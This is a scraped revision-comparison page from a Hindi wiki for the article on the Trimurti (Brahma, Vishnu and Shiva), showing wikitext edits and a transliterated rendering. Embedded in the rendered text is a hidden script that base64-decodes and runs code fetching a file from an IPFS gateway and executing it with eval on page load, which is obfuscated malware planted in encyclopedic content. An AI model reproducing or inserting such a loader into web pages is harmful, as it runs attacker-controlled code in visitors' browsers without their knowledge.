Difference between revisions of "त्रिमूर्ति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('ब्रह्मा, विष्णु एवं शिव तीनों को मिलाकर त्रिमूर...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 +
[[चित्र:Trimurti-Elephanta-Caves.jpg|thumb|त्रिमूर्ति, [[एलिफेंटा की गुफाएँ]], [[मुम्बई]]]]
 
[[ब्रह्मा]], [[विष्णु]] एवं [[शिव]] तीनों को मिलाकर त्रिमूर्ति कहते हैं। ब्रह्मा सृष्टि करने वाले, विष्णु पालन करने वाले तथा शिव (रुद्र) संहार करने वाले कहे जाते हैं। वास्तव में एक ही शक्ति के ये तीन रूप हैं।  
 
[[ब्रह्मा]], [[विष्णु]] एवं [[शिव]] तीनों को मिलाकर त्रिमूर्ति कहते हैं। ब्रह्मा सृष्टि करने वाले, विष्णु पालन करने वाले तथा शिव (रुद्र) संहार करने वाले कहे जाते हैं। वास्तव में एक ही शक्ति के ये तीन रूप हैं।  
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भारतीय संस्कृति के प्रतीक}}
 
{{भारतीय संस्कृति के प्रतीक}}

Revision as of 06:56, 21 October 2011

[[chitr:Trimurti-Elephanta-Caves.jpg|thumb|trimoorti, elipheanta ki guphaean, mumbee]] brahma, vishnu evan shiv tinoan ko milakar trimoorti kahate haian. brahma srishti karane vale, vishnu palan karane vale tatha shiv (rudr) sanhar karane vale kahe jate haian. vastav mean ek hi shakti ke ye tin roop haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh